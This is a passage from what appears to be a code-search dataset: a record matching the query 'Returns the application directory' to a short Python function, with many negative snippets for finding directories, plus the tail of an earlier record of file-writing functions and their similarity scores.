print >> fpout, outstring\n fpout.close()\n return 1", "def writehalos(self, snapshot, halos, hubble=None, outfile=None):\n s = snapshot\n grpoutfile = s.filename + \".amiga.grp\"\n statoutfile = s.filename + \".amiga.stat\"\n tipsyoutfile = s.filename + \".amiga.gtp\"\n halos.writegrp(s, halos, grpoutfile)\n halos.writestat(s, halos, statoutfile, hubble=hubble)\n shalos = halos.writetipsy(s, halos, tipsyoutfile, hubble=hubble)\n return shalos", "def dump(self, filename, mode='w', rebox=False):\n from os import path\n filepath = path.abspath(path.expanduser(filename))\n if mode == 'w':\n open(filepath, 'w').close() \n for t, ts in self:\n ts.dump(filename, rebox=rebox)", "def save_file(map_, args): \n if args.segments:\n p = os.path.join(args.res_dir, 'compression_'+args.db+\"_seg\")\n else:\n p = os.path.join(args.res_dir, 'compression_'+args.db)\n with open(p, 'w') as f:\n for file in map_:\n f.write(\"{} {}\\n\".format(file, map_[file]))", "def snapshot(self, filename=None):\n if filename:\n self.command(\"snapshot %(filename)s\" % locals())\n else:\n self.command(\"snapshot\")", "def test_16_0_saveToFile(self):\n\n Rectangle.save_to_file([self.r1, self.r2])\n self.assertTrue(os.path.isfile(\"Rectangle.json\"))", "def save_meta_file(gen_dict, f_name):\r\n logger = custom_logger.CustomLogger(run_id+':'+file_id)\r\n filename = run_id+'_'+ f_name +'.meta'\r\n f = open(os.path.join(unique_op_dir, filename),'a')\r\n print('Output stored in %s'%(str(os.path.join(unique_op_dir, filename))))\r\n logger.info('Output stored in %s'%(str(os.path.join(unique_op_dir, filename))))\r\n for key, val in gen_dict.items():\r\n line = str(key)+\" : \"+str(val)+\"\\n\"\r\n f.write(line)", "def file_output(matches: list, output_file_name: str = 'matches.txt'):\n with open(\"test/Matches/\" + output_file_name, 'w') as f:\n for match in matches:\n for event in match.events:\n f.write(\"%s\\n\" % event.payload)\n f.write(\"\\n\")", "def write_to_file(info: List[str]) -> None:\n return", "def write_to_file(self, filepath, mode = \"a\"): \n if \"r\" in mode: \n print(\"Only accepts write and append modes\")\n return \n with open(filepath, mode) as f: \n f.write(\"{}\\n\".format(self.title))\n verified, 
seen, ratio = self.get_verified_ratio()\n f.write(\"Verified Names: {}\\n\".format(str(verified)))\n f.write(\"Names: {}\\n\".format(str(seen)))\n f.write(\"Ratio: {}\\n\".format(str(ratio)))", "def save_graph(self, widget, data=None):\n\t\t#un po' di pulizia prima di fare il salvataggio\n\t\tos.system(\"find ./extra/MonitorGraph/ -type f -not -name '*.png' | xargs rm -f\")\n\t\tsnapshotFile =\"./extra/UserOutput/Snapshot\"+time.strftime(\"%Y%m%d-%H%M\", time.gmtime())+\".tar\"\n\t\tos.system(\"tar -cf \"+snapshotFile+\" --exclude def* --directory ./extra/ MonitorGraph/\")\n\t\tprint \"Snapshot saved to\",snapshotFile", "def write_file(self, filename, contents):\n blob = self.repo.create_blob(contents)\n self.index.add(pygit2.IndexEntry(filename, blob, pygit2.GIT_FILEMODE_BLOB))", "def writeFile(fileName, profile, singleScores, bestMotifs, dnaScores, bestMotif):\n with open(fileName, 'w+') as f:\n f.write(strftime(\"Created on: %Y-%m-%d %H:%M:%S\\n\", localtime()))\n f.write('Best Motifs: ')\n f.write('\\n')\n json.dump(bestMotif, f)\n f.write('\\n')\n f.write('Motifs Profile: ')\n f.write('\\n')\n json.dump(profile, f)\n f.write('\\n')\n f.write('Single Scores: ')\n f.write('\\n')\n for i in range(0, len(singleScores)):\n json.dump(bestMotifs[i], f)\n f.write(': ')\n json.dump(singleScores[i], f)\n f.write('\\n')\n f.write('Motifs that have a better score than the worst scoring one: ')\n f.write('\\n')\n for scores in dnaScores:\n json.dump(scores, f)\n f.write('\\n')", "def write_file(self, filename, fileformat=\"json\"):\n if self.df_avg is None:\n self.collect_stats()\n if fileformat == \"json\":\n self.write_json(filename)\n elif fileformat == \"excel\":\n self.write_excel(filename)", "def filewrite(self, filename):\n io.write(self, filename)", "def write_info_to_file(self):\n\n self.info.write_mission_info()\n\n self.logger.info(\"Mission instance write succeeded.\")", "def write_file(*args, **kwargs): # real signature unknown\n pass", "def write_file(self):\n if self._write_file == None:\n return\n\n try:\n out = file(self._write_file, \"w\")\n except IOError, e:\n print e\n sys.exit(1)\n out.writelines(\"A cases\") \n out.close()", "def write_results(detections, filename):\n start = time.time()\n\n boxes, labels, scores = detections\n with PathManager.open(filename, \"w\") as f:\n for key in boxes.keys():\n for box, label, score in zip(boxes[key], labels[key], scores[key]):\n f.write(\n \"%s,%.03f,%.03f,%.03f,%.03f,%d,%.04f\\n\"\n % (key, box[1], box[0], box[3], box[2], label, score)\n )\n\n logger.info(\"AVA results wrote to %s\" % filename)\n logger.info(\"\\ttook %d seconds.\" % (time.time() - start))", "def save(self, fn: str) -> None:\n fout = open(fn, 'w')\n for t,x in zip(self.times,self.milestones):\n fout.write('%f\\t%d '%(t,len(x)))\n fout.write(' '.join([str(xi) for xi in x]))\n fout.write('\\n')\n fout.close()", "def to_file(self, filename=None):\n name = None\n if filename is not None:\n name = filename\n elif self.name:\n name = self.name\n\n if name:\n #f = open(self.name, 'w')\n f = codecs.open(name, 'w', encoding='utf-8')\n self.seek(0)\n f.write(self.read())\n f.close()\n else:\n print \"No log_name for this log\"", "def store(self, filename):", "def write(self):\n f, ds = self.opendset()\n #\n # Now add the images\n #\n start_time = time.clock() # time this\n nframes = 0 # number completed\n print_every = 1; marker = \" .\";\n print('Frames written (of %s):' % self.ntowrite, end=\"\")\n for i in range(self.nfiles):\n if nframes >= self.ntowrite: break\n\n 
logging.debug('processing file %d of %d' % (i+1, self.nfiles))\n img_i = fabio.open(self.files[i])\n nfi = img_i.nframes\n for j in range(nfi):\n msg = '... file %d/image %d' % (i, j)\n logging.debug(msg)\n if j < self.nempty:\n logging.debug('... empty frame ... skipping')\n else:\n ds[nframes, :, :] = img_i.data\n nframes += 1\n if numpy.mod(nframes, print_every) == 0:\n print(marker, nframes, end=\"\")\n print_every *= 2\n sys.stdout.flush()\n logging.debug('... wrote image %s of %s' %\\\n (nframes, self.ntowrite))\n if nframes >= self.ntowrite:\n logging.debug('wrote last frame: stopping')\n break\n if j < nfi - 1:\n # on last frame in file, fabio will look for next file\n img_i = img_i.next()\n\n f.close()\n print(\"\\nTime to write: %f seconds \" %(time.clock()-start_time))", "def save_quickstreams(quickstreams):\n with open('quickstreams.txt', 'w') as f:\n json.dump(quickstreams, f, indent=4)", "def write_image(out, frame):\n if not os.path.exists(out):\n os.makedirs(out)\n now = datetime.now() \n dt_string = now.strftime(\"%H-%M-%S-%f\") \n filename = f'{out}/{dt_string}.png'\n logging.info(f'write image {filename}')\n cv2.imwrite(filename, frame)", "def __write_measurement(self, measurement):\n with self.__filename.open(mode='a') as history_file:\n history_file.write(measurement + '\\n')", "def write_output_file(self, index):\n ctx = self.block_store.make_local_output(self.expected_outputs[index])\n self.open_output_contexts[index] = ctx\n return ctx.get_filename()", "def _toFile(self):\n pass", "def write(self, outfile):\n outfile.write(\n '\\t'.join(\n [\n str(i) for i in [\n self.chrom, self.start, self.end, self.name,\n self.count, self.fold_change, self.log10p\n ]\n ]\n )\n )\n outfile.write('\\n')", "def writefile():\n\n print(\"Writing to file...\")\n\n # Open the heartbeat file in append mode and save the current time.\n with open(settings.ROOT_DIR + \"/heartbeat\", \"a\") as f:\n f.write(str(time()))", "def saveToFile(html):\n #print(\"Saving to file.\")\n html += \"\\n\"\n #open necessary files to save\n logFile = open(\"postLog_{0}_{1}.txt\".format(os.path.splitext(path)[0], dateTimeNow), \"a\")\n logFile.write(html)\n logFile.close()\n #print(\"Check Point.\")", "def save_outputs(d, dst_dir, site, file_format='json', write_mode='w'):\n \n \n min_date_str = str(min([pd.Timestamp(x) for x in d.keys()]).date())\n max_date_str = str(max([pd.Timestamp(x) for x in d.keys()]).date())\n fn = '_'.join([site, min_date_str, max_date_str]) + '.' 
+ file_format\n dst = os.path.join(dst_dir, fn)\n with open(dst, write_mode) as f:\n if (file_format == 'json') & (write_mode =='w'):\n json.dump(d, f)\n elif (file_format == 'pkl') & (write_mode == 'wb'):\n pickle.dump(d, f)\n else:\n raise ValueError(\"File format or write mode incorrect.\\nOptions are 1) 'json', 'w' and 2) 'pkl', 'wb'\")", "def write_backup_file(backup_file, backup_data):\n\n fp = open(backup_file, mode=\"w\")\n\n for record in backup_data.values():\n json_str = json.dumps(record)\n fp.write(json_str)\n fp.write(\"\\n\")\n\n fp.close()", "def write_file(self):\n rl_df, lift_df = self.create_df()\n\n number = re.findall('\\d+', self.url)[0]\n\n if self.write is True:\n with open('house_{}.csv'.format(number), 'w',\n encoding='utf-8-sig') as file:\n rl_df.to_csv(file, sep=';')\n with open('house_lifts_{}.csv'.format(number), 'w',\n encoding='utf-8-sig') as file2:\n lift_df.to_csv(file2, sep=';')", "def save_meta(self):\n # jOut = os.path.join(self.meta[\"wdir\"], meta_file)\n with open(self.meta_filepath, \"w\") as f:\n json.dump(self.meta, f)", "def save(self,outPath=None):\n if (not self.canSave): raise StateError(_(\"Insufficient data to write file.\"))\n if not outPath:\n fileInfo = self.fileInfo\n outPath = os.path.join(fileInfo.dir,fileInfo.name)\n out = file(outPath,'wb')\n #--Tes3 Record\n self.tes3.setChanged()\n self.tes3.hedr.setChanged()\n self.tes3.hedr.numRecords = len(self.records) #--numRecords AFTER TES3 record\n self.tes3.getSize()\n self.tes3.dump(out)\n #--Other Records\n for record in self.records:\n record.getSize()\n record.dump(out)\n out.close()", "def write_to_file(self, papers, filename):\n\t\tpass", "def write_the_contents_to_the_same_file(self):\n if not len(self.student_list):\n print('There is no contents to write')\n return\n\n if self._filename is None:\n self._filename = self.input_filename()\n\n with open(self._filename, 'w') as OUT:\n OUT.write(self.student_list.to_csv(date_format='%Y-%m-%d',\n sep='\\t', header=False, columns=self.columns_to_save))\n print(f'Data are saved into {self._filename!r}')", "def write(self, filename):\n\n self.__image.save(filename)", "def save(self, fname, snver=None):\n self._io.save(fname)", "def write_to_file(fib_details: dict):\n pass # TODO: Replace with implementation!", "def write_to_file(start_runtime, contents, write_mode='a'):\n with open(f\"{start_runtime}.txt\", write_mode) as f:\n f.write(\"Filename\\t\\tMaxTrack\\tNumInst\\t\\tTimeSig\\t\\tTPB\\n\")\n f.write(contents)", "def write_to_file(self, filename):\n self.octree.write(str.encode(filename))\n print(\"Save octomap to \"+filename)", "def write_to_file(self, file, content):\n with open(file, 'a') as report_file:\n report_file.write('{}\\n'.format(content))", "def log_event_to_file(event):\n with open('eventlogs/{}.json'.format(time.time()), 'w') as event_write:\n event_write.write(json_dumpstring(event))\n pass", "def write_thumbnails(self, appstruct):\n slugser = slugify(appstruct[\"serial\"])\n pdf_filename = \"thumbnails/%s/uploaded.pdf\" % slugser\n top_file = \"thumbnails/%s/top.png\" % slugser\n mos_file = \"thumbnails/%s/mosaic.png\" % slugser\n \n thumg = ThumbnailGenerator(pdf_filename)\n self.save_blob(thumg.top_thumbnail(), top_file)\n self.save_blob(thumg.mosaic_thumbnail(), mos_file)", "def write(self):\n # # Sometimes file is not written properly. 
So delete and rewrite it\n # os.system('rm {}'.format(snip_dir + '/' + self.name))\n # if 'NUM_TIME_STEPS' not in self.define.keys():\n # warnings.warn('NUM_TIME_STEPS missing in header. Execution may hang!')\n with open(snip_dir + '/' + self.name, 'w') as f:\n f.write('/* Temporary generated file for snip process definitions before compilation */\\n')\n f.write(self.__str__())\n\n # os.system('ls {}'.format(snip_dir + '/' + self.name))", "def save(self, filename):\n o = open(filename, 'w')\n o.write(self.write())\n o.close()", "def save(self, f):\n self.f = f\n for region in self.regions:\n ext = region.address & 0xFFFF0000\n self.write_hex_line(\n HexLine(0, EXTLINADR, struct.pack(\">H\", ext >> 16))\n )\n address = region.address - ext\n for chunk in chunks(region.data):\n if address >= 0x10000:\n ext += 0x10000\n self.write_hex_line(\n HexLine(0, EXTLINADR, struct.pack(\">H\", ext >> 16))\n )\n address -= 0x10000\n self.write_hex_line(HexLine(address, DATA, chunk))\n address += len(chunk)\n self.write_hex_line(HexLine(0, EOF))", "def write_hashes(filename):\n\n [head, tail] = os.path.split(filename)\n new_filename = f\"{head}/hashed-{tail}\"\n\n shutil.copy(filename, new_filename)\n\n with open(filename) as in_file:\n data = json.loads(in_file.read())\n\n click.echo(f\"Event ID: {data['event_id']}\")\n click.echo(\"Writing span hashes\")\n\n config = load_span_grouping_config({\"id\": DEFAULT_CONFIG_ID})\n results = config.execute_strategy(data)\n\n with open(new_filename, \"w\") as out_file:\n results.write_to_event(data)\n out_file.write(json.dumps(data, indent=4))\n\n click.echo(\"Done\")\n click.echo(\"\\n\")", "def write_map_to_file(dir, version, role, map_id, d):\n if not os.path.exists(dir):\n os.makedirs(dir)\n path = build_output_file_path(dir, version, role, map_id)\n with open(path, \"w\") as f:\n json.dump(d, f, sort_keys=True, indent=4)\n f.close()", "def write_output_shifts_to_file(self, shift_output):\n pass", "def store_action_log(self, filename):\n t = self.get_current_timeindex()\n camera_obs = self.get_camera_observation(t)\n self._action_log[\"final_object_pose\"] = {\n \"t\": t,\n \"pose\": camera_obs.object_pose,\n }\n\n with open(filename, \"wb\") as fh:\n pickle.dump(self._action_log, fh)", "def write_state_file(self, state):\r\n with open(StudentModuleHistoryCleaner.STATE_FILE, \"w\") as state_file:\r\n state_file.write(state)", "def GenerateRevisionFile(self):\n\n print 'Saving revision to %s' % self.revisions_path\n Write(\n self.revisions_path,\n ('{\"chromium_revision\":%d, \"webkit_revision\":%d, '\n '\"v8_revision\":%d}') % (self._chromium_revision,\n self._webkit_revision,\n self._v8_revision))", "def write_md_file(sip_uuid, filepath):\n sip = SIP.objects.get(pk=sip_uuid)\n md_object = load_file_data_from_db(sip, filepath)\n convert_md_object = json.dumps(\n md_object, sort_keys=True, ensure_ascii=False, indent=4\n )\n filename = os.path.join(filepath, \"metadata_output.json\")\n with open(filename, \"wb\") as f:\n f.write(six.ensure_binary(convert_md_object))", "def write_run(run):\n r=Run(run)\n r.write_all()", "def saveUsage(self, filePath):\n message = time.strftime('%c') + ' : '\n for spot in self.getParkingSpots():\n message += str(spot.id) + ', ' + spot.status + '; '\n with open(filePath, 'a+') as outfile:\n outfile.write(message + '\\n')\n pass", "def save(self, path, alignment, positions):\n path = path[7:]\n if path[-5:] != \".json\":\n path += \".json\"\n if path[0] == \"/\" and path[2] == \":\":\n path = path[1:] # Windows fix\n with 
open(path, \"w\") as outfile:\n value = {\n \"angleCommand\": self._angle_command,\n \"horizontalCommand\": self._horizontal_command,\n \"verticalCommand\": self._vertical_command,\n \"origin\": self._origin,\n \"frameWidth\": self._frame_width,\n \"frameHeight\": self._frame_height,\n \"runs\": [r.to_json() for r in self._runs],\n \"alignment\": alignment.to_dict(),\n \"positions\": positions.to_dict()\n }\n json.dump(value, outfile)", "def write_to_file(entry, file):\n with open(file, \"a\") as f:\n f.write(entry)", "def _file_writer(self, lines, filename):\n if self.MockRun:\n return\n\n if self.Verbose:\n print \"Writing file %s\" % filename\n\n updated_file = open(filename, 'w')\n updated_file.write(''.join(lines))\n updated_file.close()", "def write_file(self, contents):\n fd = open(os.path.join(os.path.dirname(__file__),\n 'data', 'test.html'), 'w')\n fd.write(contents)\n fd.close()", "def write_to_file(inventory):\n env = Environment(loader=FileSystemLoader('templates'), trim_blocks=True)\n output_template = env.get_template('output.j2')\n # create and clean an 'outputs' folder\n path = \"./outputs\"\n try:\n shutil.rmtree(path, ignore_errors = True, onerror = None)\n except:\n print('Error while deleting directory')\n os.mkdir(path)\n os.chdir(path)\n for node, node_data in inventory.items():\n if 'outputs' in node_data:\n os.mkdir(node)\n for command, output in node_data['outputs'].items():\n # when creating filenames based on command, swap 'spaces' with 'underscores':\n command = re.sub(r\"\\s\", r\"_\", command)\n open(f\"{node}/{command}.txt\", 'a').write(\n output_template.render(node=node, data=output))\n print(\"\\n\" + f\"Job complete. If data gathering was successful, see 'outputs' directory.\")\n return inventory", "def write_jobfile(self, copyfiles):\n with open(self.options.jobfile, 'w') as fd:\n fd.write(json.dumps(copyfiles, indent=2))", "def save_features_to_file(self):\n if not os.path.exists(self.features_save_path):\n os.makedirs(self.features_save_path)\n for s in self.sets:\n self.save_features_to_file_by_set(s)", "def write_s3_file(data, date):\n logger.info(\"Writing history file to S3.\")\n bucket = os.getenv(\"SPOTIFY_BUCKET_NAME\")\n path = os.getenv(\"SPOTIFY_BUCKET_PATH\")\n s3 = boto3.client('s3')\n data = json.dumps(data)\n s3.put_object(Bucket=bucket, Key=\"%s/%s.json\" % (path, date), Body=data)", "def write_image(self, filename):\n cv2.imwrite(filename, self.image)", "def write(self, filename, data):\n raise NotImplementedError", "def write(self, file):\n pos = file.tell()\n pickle.dump((self.index, self.meta, self.info), file)\n file.seek(0)\n\n # update the header with the position of the content index.\n file.write(struct.pack('<Q', pos))", "def _write(self, filename, data):\n fullpath = os.path.join(self._tempdir, filename)\n with open(fullpath, 'w') as ofile:\n json.dump(data, ofile)\n return fullpath", "def write(self, filename, mode=\"w\"):\n d = self._result_dict\n val = yaml.safe_dump(d, default_flow_style=False)\n\n with open(str(filename), mode) as outfile:\n outfile.write(val)", "def _write_file(output_path: str, file_content: Iterable[str]) -> None:\n with open(output_path, \"w+\", encoding=\"utf-8\") as f:\n f.writelines(file_content)\n\n logging.info(f\"wrote to '{output_path}'\")", "def write_file_set(self, write_file):\n self._write_file = write_file", "def writeAlltoFile(self):\n with open(self._fname, 'w') as f:\n for elem in self.getAll():\n line = self._writeGratoLine(elem)\n f.write(line + \"\\n\")\n f.close()", "def 
fileWrite(content):\n file = open('./result.txt', 'w')\n file.write(content)\n file.close()", "def writeOut(self):\n # import time\n self.outHeader = self.srcHeader\n for line in self.outHeader:\n self.outFile.write(line + '\\n')\n # now = time.asctime(time.localtime(time.time()))\n # self.outFile.write('%% -- %s -- Written to new alog' % now)\n for time_s in sorted(self.outData):\n for sens in self.outData[time_s]:\n for meas in self.outData[time_s][sens]:\n valu = self.outData[time_s][sens][meas]\n msg_list = [str(time_s), meas, sens, str(valu)]\n line_string = reconstructLine(msg_list)\n self.outFile.write(line_string + '\\n')", "def take_snapshot():\n df = scrape()\n for i in df.index:\n single = df.loc[i]\n # create or get locations\n loc, created = Location.objects.get_or_create(\n name=single['Location'],\n all_stands=single['Stands'],\n coordinates=single['Coords']\n )\n # add a new snapshot\n obj = Snapshot(\n location=loc,\n avail_bikes=single['Bikes'],\n free_stands=single['Free stands'],\n timestamp=datetime.now(tz=timezone('Europe/Warsaw'))\n )\n obj.save()", "def write_checkpoint(self):\n self.file_checkpoint_data = open(self.path_checkpoint, \"a+\")\n array_to_write = [str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n self.file_checkpoint_data.write(','.join(array_to_write) + \"\\n\")\n self.file_checkpoint_data.flush()", "def write_to(self, filename):\n with open(filename, 'w') as f:\n for xx, yy in zip(self.x, self.y):\n f.write(\"%s %s\\n\" % (xx, yy))\n logger.info(\"Written locations into file {0}\".format(filename))", "def write_xyz_file(allxyz):\n if SAVEXYZ:\n print('+> Saving riverbed topography file...', end='')\n if MODE == 1:\n np.savetxt('kinoshita_topo.xyz', allxyz, fmt='%.6e')\n elif MODE == 2:\n np.savetxt(FNAME.rsplit('.', 1)[0] + '_topo.xyz', allxyz, fmt='%.6e')\n print(' [done]')", "def write(self, filename, *args, **kwargs):\n self.to_fits().writeto(filename, *args, **kwargs)", "def save(self, inst):\n n = inst.dimensions[\"n\"]\n with open(self.location, \"wt\") as f:\n f.write(f\"measurements: {n}\\n\")\n f.write(f\"time temperature\\n\")\n for time, temp in zip(inst.time, inst.temperature):\n f.write(f\"{time:4} {temp:12}\\n\")", "def save_as(self, filename):\n opencv.imwrite(filename, self.img)", "def log_to_file(text, status='INFO'):\n outfile = open(LogName, 'a')\n outfile.write(timestamp()+' - '+status+' - '+str(text)+'\\n')\n outfile.close()" ]
[ "0.7562754", "0.743017", "0.65671015", "0.65112525", "0.64657086", "0.64657086", "0.6451764", "0.64466846", "0.6254951", "0.6253342", "0.617585", "0.612374", "0.61043537", "0.60520536", "0.6024088", "0.6023335", "0.6000197", "0.59535676", "0.58751094", "0.58477306", "0.5843929", "0.58373475", "0.58362603", "0.5787403", "0.57794976", "0.57612395", "0.57568026", "0.5736809", "0.57268786", "0.5725884", "0.5718465", "0.5707559", "0.57068634", "0.57051593", "0.5701365", "0.5695726", "0.5692383", "0.5671681", "0.56697845", "0.5668952", "0.56333035", "0.56287324", "0.5622316", "0.55949354", "0.55928165", "0.5591611", "0.55842584", "0.5580846", "0.55775553", "0.55746657", "0.55710274", "0.55685514", "0.5568485", "0.5563695", "0.5558654", "0.5551221", "0.5549031", "0.5548754", "0.5541194", "0.5540035", "0.55400306", "0.55246824", "0.55188715", "0.5510329", "0.55068064", "0.5505558", "0.5502339", "0.5501603", "0.55009997", "0.5489955", "0.5486651", "0.5478949", "0.5477387", "0.5476911", "0.54641855", "0.54568875", "0.5454869", "0.5453928", "0.5453023", "0.54456866", "0.54424787", "0.54385954", "0.5437192", "0.54368", "0.54329026", "0.5427637", "0.5419708", "0.54187787", "0.5418108", "0.54150265", "0.5412744", "0.5411617", "0.54024976", "0.5402494", "0.54017276", "0.53987134", "0.53948605", "0.5394765", "0.5394127", "0.5392206", "0.53852654" ]
0.0
-1
Returns the application directory.
def get_appdir(): return APP_PATH
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def app_dir(self):\n return self._app_dir", "def appdata_dir(self) -> str:\n return os.path.join(self._project_dir, 'appdata')", "def thisdir():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n # Change this bit to match where you store your data files:\n return os.path.dirname(__file__)", "def this_folder():\n if getattr(sys, 'frozen', False):\n # The application is frozen\n return os.path.dirname(sys.executable)\n else:\n # The application is not frozen\n return os.path.dirname(__file__)", "def get_root_directory() -> str:\n return \"{}/../\".format(get_cur_directory(__file__))", "def root_dir():\r\n return Path(__file__).parent.parent", "def GetPackageDirectory():\n return os.path.dirname(__file__)", "def get_app_root():\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n return sys._MEIPASS\n except AttributeError:\n if 'pytest' in sys.modules:\n for arg in reversed(sys.argv):\n path = os.path.realpath(arg.split('::')[0])\n if os.path.exists(path):\n return path if os.path.isdir(path) else os.path.dirname(path)\n else:\n return os.path.dirname(os.path.realpath(sys.argv[0]))", "def config_directory(self):\n\n return self.get_raw(\"config_directory\")", "def _get_vispy_app_dir():\n # Define default user directory\n user_dir = os.path.expanduser('~')\n\n # Get system app data dir\n path = None\n if sys.platform.startswith('win'):\n path1, path2 = os.getenv('LOCALAPPDATA'), os.getenv('APPDATA')\n path = path1 or path2\n elif sys.platform.startswith('darwin'):\n path = os.path.join(user_dir, 'Library', 'Application Support')\n # On Linux and as fallback\n if not (path and os.path.isdir(path)):\n path = user_dir\n\n # Maybe we should store things local to the executable (in case of a\n # portable distro or a frozen application that wants to be portable)\n prefix = sys.prefix\n if getattr(sys, 'frozen', None): # See application_dir() function\n prefix = os.path.abspath(os.path.dirname(sys.path[0]))\n for reldir in ('settings', '../settings'):\n localpath = os.path.abspath(os.path.join(prefix, reldir))\n if os.path.isdir(localpath):\n try:\n open(os.path.join(localpath, 'test.write'), 'wb').close()\n os.remove(os.path.join(localpath, 'test.write'))\n except IOError:\n pass # We cannot write in this directory\n else:\n path = localpath\n break\n\n # Get path specific for this app\n appname = '.vispy' if path == user_dir else 'vispy'\n path = os.path.join(path, appname)\n return path", "def get_directory() -> str:\n return directory", "def root_dir():\n return dirname(dirname(__file__))", "def get_root_dir():\n return os.path.dirname(os.path.dirname(__file__))", "def AppPath(self):\n\t\treturn self.acad.Path", "def rootdir():\n return util.path(__file__).parent.parent.abspath()", "def path_to_program_dir(self):\n\tpath = sys.argv[0]\n\n\tif not os.path.isdir(path):\n\t path = os.path.dirname(path)\n\n\tif not path: return '.'\n\n\treturn path", "def get_current_directory():\n\treturn os.path.dirname(os.path.abspath(__file__))", "def acquire_package_directory():\n top_plugin_dir = os.path.realpath(os.path.join(os.getcwd(),\n os.path.dirname(__file__)))\n expected_package_dir = '/extras/MockApp'\n app_dir = top_plugin_dir + expected_package_dir\n return app_dir", "def root_dir():\n return os.path.dirname(os.path.realpath(__file__ + '/..'))", "def root_dir():\n return os.path.dirname(os.path.realpath(__file__ + '/..'))", "def get_config_dir() -> str:\n # Get the system app 
configuration standard location\n if 'APPDATA' in os.environ:\n return os.environ['APPDATA']\n elif 'XDG_CONFIG_HOME' in os.environ:\n return os.environ['XDG_CONFIG_HOME']\n else:\n return os.path.join(os.environ['HOME'], '.config')", "def directory_root():\n\timport os\n\treturn os.path.join(os.path.dirname(__file__), '../..')", "def dirname(self):\n module_system = str(self.conf.module.__name__).split(\".\")[-1]\n return root_path(module_system, self.conf.name)", "def program_dir():\n if (Win32() and (hasattr(sys, 'frozen') or imp.is_frozen('__main__'))):\n # running from exe generated by py2exe\n return os.path.dirname(sys.executable)\n else:\n return sys.path[0]\n # return os.path.dirname(os.path.abspath(sys.argv[0]))", "def configPath(self):\n return os.path.dirname(__file__)", "def app_package_path(self) -> str:\n return self._app_package_path", "def getPath(self):\n path = os.path.dirname(os.path.realpath(__file__)) #Finds the path of the application\n path =(os.path.dirname(os.path.realpath(__file__))+ '\\\\Enigma Settings') #Adds to the directory to create a folder\n \n return path #Returns the folders directory", "def app_config_home(self) -> str:\n if self.app_config_has(\"app_config_home_directory\"):\n return self.app_config()[\"app_config_home_directory\"]\n return os.path.join(os.path.expanduser(\"~\"), '.aiscalator')", "def get_main_dir():\n return os.path.dirname(os.getcwd())", "def config_dir(self) -> str:\n if not self._config_dir:\n self._config_dir = self._detect_config_dir()\n return self._config_dir", "def getRootPath()->str:\n if '--develop' in sys.argv:\n return eel._get_real_path('public') + '/'\n\n return eel._get_real_path('build') + '/'", "def appdata_dir():\r\n if platform.system() == \"Windows\":\r\n return os.path.join(os.environ[\"APPDATA\"], \"Electrum\")\r\n elif platform.system() == \"Linux\":\r\n return os.path.join(sys.prefix, \"share\", \"electrum\")\r\n elif (platform.system() == \"Darwin\" or\r\n platform.system() == \"DragonFly\" or\r\n\t platform.system() == \"NetBSD\"):\r\n return \"/Library/Application Support/Electrum\"\r\n else:\r\n raise Exception(\"Unknown system\")", "def root_dir():\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', \"..\")", "def get_installdir(self):\n import mewlo\n path = os.path.dirname(os.path.realpath(mewlo.__file__))\n return path", "def root_dir(self):\n path = self.config_path()\n if path:\n root_dir = os.path.dirname(path)\n if not root_dir.endswith(\"/\"):\n root_dir += \"/\"\n return root_dir\n return None", "def app_path(self, package):\n return self.adb.app_path(package)", "def getRootDirectory(self):\n if Globals.WORKFLOWS_BASEDIR[0] == '~':\n return os.path.expanduser(Globals.WORKFLOWS_BASEDIR)\n else:\n return os.path.join('', Globals.WORKFLOWS_BASEDIR)", "def get_workdir() -> str:\n Config.__get()\n assert Config.__config is not None\n return get_abspath(Config.__config.get('wsgi', 'workdir').strip())", "def get_working_dir(self):\n return self.role.directory", "def GetLauncherPath(self):\n return os.path.dirname(__file__)", "def GetLauncherPath(self):\n return os.path.dirname(__file__)", "def get_config_dir():\n return Path(environ.get(CONFIG_DIR_ENV_VAR, _default_dir))", "def get_base_dir(self):\n dir_of_this_file = os.path.dirname(os.path.abspath(__file__))\n return os.path.dirname(dir_of_this_file)", "def getSteamAppDir(appid: int) -> str:\n\tfor path in libraryFolders():\n\t\ttry:\n\t\t\tlogger.info(f'searching for {appid} in {path}..')\n\t\t\twith 
open(f'{path}appmanifest_{appid}.acf', 'r') as file:\n\t\t\t\t# found the app!\n\t\t\t\t# get the app's name\n\t\t\t\tinstDir = Property.parse( file, f'appmanifest_{appid}.acf' ).as_dict()[ 'appstate' ][ 'installdir' ]\n\t\t\t\tpath += f'common/{instDir}/'\n\t\t\t\tlogger.info(f'{appid} found! path: {path}')\n\t\t\t\treturn path\n\t\texcept FileNotFoundError:\n\t\t\t# if no, just continue\n\t\t\tcontinue\n\traise RuntimeError(f'No path found for app {appid}!')", "def get_package_dir():\n return Path(__file__).parent", "def configDir():\n return os.path.join(os.environ['HARNESSEDJOBSDIR'], 'config', getSiteName())", "def config_dir(self) -> Path:\n return self._config_dir", "def get_script_directory():\n return os.path.dirname(__file__)", "def home_directory(self):\n out = self._call(\"GETHOMEDIRECTORY\")\n return out.json()[\"Path\"]", "def service_directory(self) -> str:\n return pulumi.get(self, \"service_directory\")", "def getScriptDirectory():\n\n\treturn os.path.dirname(os.path.realpath(__file__))", "def find_project_dir():\r\n for path in sys.path:\r\n abs_path = os.path.join(os.path.abspath(path), \"app.yaml\")\r\n if os.path.exists(abs_path):\r\n return os.path.dirname(abs_path)\r\n\r\n raise RuntimeError(\"Unable to locate app.yaml on sys.path\")", "def confDir(self):\r\n return self._confDir", "def data_directory(self):\n\n return self.get_raw(\"data_directory\")", "def path(self):\n return os.path.join(self.config.get('path', os.getcwd()))", "def get_data_dir():\n return Path(current_app.config[\"USER_DIR\"]) / \"data\"", "def conf_dir(self):\r\n return self._conf_dir", "def _getCodeFolder(self):\n if getattr(sys, 'frozen', False):\n # we are running in a bundle (frozen)\n bundle_dir = sys._MEIPASS\n else:\n # we are running in a normal Python environment\n bundle_dir = os.path.dirname(os.path.abspath(__file__))\n return bundle_dir", "def get_app_config_dir(appname, *args):\n import ubelt as ub\n ub.schedule_deprecation(\n modname='ubelt', name='get_app_config_dir and ensure_app_config_dir', type='function',\n migration='use ubelt.Path.appdir(type=\"config\") instead',\n deprecate='1.2.0', error='2.0.0', remove='2.1.0')\n dpath = join(platform_config_dir(), appname, *args)\n return dpath", "def get_dir_path():\n return 